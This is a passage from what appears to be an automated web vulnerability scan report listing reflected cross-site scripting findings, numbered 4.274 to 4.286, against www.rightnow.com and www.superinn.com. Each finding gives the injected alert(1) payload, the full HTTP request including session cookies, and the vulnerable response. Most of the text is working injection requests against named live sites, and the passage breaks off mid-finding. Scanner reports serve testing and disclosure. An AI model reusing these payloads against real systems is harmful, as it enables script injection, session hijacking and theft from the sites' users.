The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8aaf'-alert(1)-'89ee7162aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf95/floatboxd8aaf'-alert(1)-'89ee7162aab/options.js HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38735

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
om/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatboxd8aaf'-alert(1)-'89ee7162aab/options.js',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.274. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fa57'-alert(1)-'42be76e26c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js4fa57'-alert(1)-'42be76e26c0 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38735

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js4fa57'-alert(1)-'42be76e26c0',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.275. http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbb57'-alert(1)-'a41769cc3f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js?bbb57'-alert(1)-'a41769cc3f6=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/omniture_variable_setup.js?_=1314814580371
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B; COOKIE_TEST=RNT; noChat=RNTLIVE

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:19:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38738

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/javascript3f0a9'-alert(1)-'5e2ee8acf95/floatbox/options.js?bbb57'-alert(1)-'a41769cc3f6=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.276. http://www.rightnow.com/mobile.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/mobile.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 858a5'-alert(1)-'825233dafa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mobile.css858a5'-alert(1)-'825233dafa2 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:16:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38687

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/mobile.css858a5'-alert(1)-'825233dafa2',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.277. http://www.rightnow.com/mobile.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/mobile.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1104'-alert(1)-'531515845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mobile.css?f1104'-alert(1)-'531515845=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Finterface.q-go.net%252Frightnow%252Findex.php%253Ftpl%253Dask%2526q%253Dxss%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:16:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38688

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/mobile.css?f1104'-alert(1)-'531515845=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.278. http://www.rightnow.com/rightnow_secondary.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/rightnow_secondary.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a583'-alert(1)-'4b76b1ad986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rightnow_secondary.css8a583'-alert(1)-'4b76b1ad986 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.rightnow.com%252Fcx.php%3B%20s_sq%3D%3B; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:16:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38699

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
et('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/rightnow_secondary.css8a583'-alert(1)-'4b76b1ad986',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.ge
...[SNIP]...

4.279. http://www.rightnow.com/rightnow_secondary.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/rightnow_secondary.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30c8e'-alert(1)-'60cc89cbe95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rightnow_secondary.css?30c8e'-alert(1)-'60cc89cbe95=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.rightnow.com%252Fcx.php%3B%20s_sq%3D%3B; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:16:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38702

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
t('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/rightnow_secondary.css?30c8e'-alert(1)-'60cc89cbe95=1',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQuery.
...[SNIP]...

4.280. http://www.rightnow.com/search/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/search/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8f17'-alert(1)-'bf6b026719f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /searchf8f17'-alert(1)-'bf6b026719f/?q=xss HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://interface.q-go.net/rightnow/index.php?tpl=ask&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.rightnow.com%252Fcx.php%3B%20s_sq%3D%3B; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT

Response

HTTP/1.1 404 Not Found
Date: Wed, 31 Aug 2011 18:16:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 38690

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><
...[SNIP]...
jQuery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/searchf8f17'-alert(1)-'bf6b026719f/?q=xss',
isPremium: '0',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});
jQ
...[SNIP]...

4.281. http://www.rightnow.com/search/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4626d'-alert(1)-'8e38a3c5ccd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search/?q=xss&4626d'-alert(1)-'8e38a3c5ccd=1 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://interface.q-go.net/rightnow/index.php?tpl=ask&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.rightnow.com%252Fcx.php%3B%20s_sq%3D%3B; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:16:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=2592000
Expires: Fri, 30 Sep 2011 18:16:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 43205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 12149 - publ
...[SNIP]...
ery.get('http://www.rightnow.com/includes/premium_integration.php',
{
c_id: existingRightNowContactID,
page_url: 'http://www.rightnow.com/search/?q=xss&4626d'-alert(1)-'8e38a3c5ccd=1',
isPremium: '',
time: tsTimeStamp
});

}
if(includeOmniture != "no")
{
jQuery.ajaxSetup({async: false});

...[SNIP]...

4.282. http://www.rightnow.com/search/ [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/search/

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff99"><script>alert(1)</script>6ad8c47ae16 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?q=xss5ff99"><script>alert(1)</script>6ad8c47ae16 HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://interface.q-go.net/rightnow/index.php?tpl=ask&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.rightnow.com%252Fcx.php%3B%20s_sq%3D%3B; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:16:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=2592000
Expires: Fri, 30 Sep 2011 18:16:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 40850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 12149 - publ
...[SNIP]...
<input type="hidden" value="xss5ff99"><script>alert(1)</script>6ad8c47ae16" name="q" />
...[SNIP]...

4.283. http://www.rightnow.com/search/ [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rightnow.com
Path:	/search/

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9c6"%3balert(1)//5a9f32949ac was submitted in the q parameter. This input was echoed as ae9c6";alert(1)//5a9f32949ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search/?q=xssae9c6"%3balert(1)//5a9f32949ac HTTP/1.1
Host: www.rightnow.com
Proxy-Connection: keep-alive
Referer: http://interface.q-go.net/rightnow/index.php?tpl=ask&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=guhn714pb9618mpe96ualf8nm7; s_sess=%20s_cc%3Dtrue%3B%20p17%3Dhttp%253A%252F%252Fwww.rightnow.com%252Fcx.php%3B%20s_sq%3D%3B; s_vi=[CS]v1|272F3D2685158195-400001808002B910[CE]; COOKIE_TEST=RNT

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:16:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=2592000
Expires: Fri, 30 Sep 2011 18:16:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 40777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 12149 - publ
...[SNIP]...
<script type="text/javascript">
function comTab()
{
document.getElementById('commTab').src = "community_tab.php?q=xssae9c6";alert(1)//5a9f32949ac";
}
function crmSupportTab()
{
document.getElementById('supportTab').src = "support_tab.php?q=xssae9c6";alert(1)//5a9f32949ac";
}

</script>
...[SNIP]...

4.284. https://www.superinn.com/copy1/ResMain.asp [crypt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.superinn.com
Path:	/copy1/ResMain.asp

Issue detail

The value of the crypt request parameter is copied into the HTML document as plain text between tags. The payload 6a126<script>alert(1)</script>6682e1a2063 was submitted in the crypt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /copy1/ResMain.asp?crypt=6a126<script>alert(1)</script>6682e1a2063 HTTP/1.1
Host: www.superinn.com
Connection: keep-alive
Referer: https://www.superinn.com/copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C%7C%B2%A8%95J%9B%9D%A8%B4%BE%A8%93w%AE%8D%AF%BD%A7%C7%BF%A2y%84%93%A2%BBh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADAAARA=DJCOLOPAIDLKMBMAHHMNFCFB

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:37 GMT
X-Powered-By: ASP.NET
Content-Length: 146
Content-Type: text/html
Cache-control: private

We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:6a126<script>alert(1)</script>6682e1a2063<br>

4.285. https://www.superinn.com/frametest.asp [dk parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.superinn.com
Path:	/frametest.asp

Issue detail

The value of the dk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4fc2'%3balert(1)//9556241b89c was submitted in the dk parameter. This input was echoed as e4fc2';alert(1)//9556241b89c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /frametest.asp?dk=The%20Hanover%20Housee4fc2'%3balert(1)//9556241b89c&wrnum=&propid=&rpn=&rd=&rddate=&nightnum=&nip= HTTP/1.1
Host: www.superinn.com
Connection: keep-alive
Referer: http://www.hanoverhouseinn.com/specialsfall.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADAAARA=DJCOLOPAIDLKMBMAHHMNFCFB

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:53 GMT
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Cache-control: private

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {
window.location.replace('https://www.superinn.com/webview1.asp?dk=The Hanover Housee4fc2';alert(1)//9556241b89c&rpn=1&wrnum=&propid=&rd=&rddate=&nightnum=&nip=')
}
//alert(parent.frames.length)
</script>

4.286. https://www.superinn.com/frametest.asp [nightnum parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.superinn.com
Path:	/frametest.asp

Issue detail

The value of the nightnum request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edd60'%3balert(1)//6933e5ef7f9 was submitted in the nightnum parameter. This input was echoed as edd60';alert(1)//6933e5ef7f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /frametest.asp?dk=The%20Hanover%20House&wrnum=&propid=&rpn=&rd=&rddate=&nightnum=edd60'%3balert(1)//6933e5ef7f9&nip= HTTP/1.1
Host: www.superinn.com
Connection: keep-alive
Referer: http://www.hanoverhouseinn.com/specialsfall.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADAAARA=DJCOLOPAIDLKMBMAHHMNFCFB

Response

HTTP/1.1 200 OK
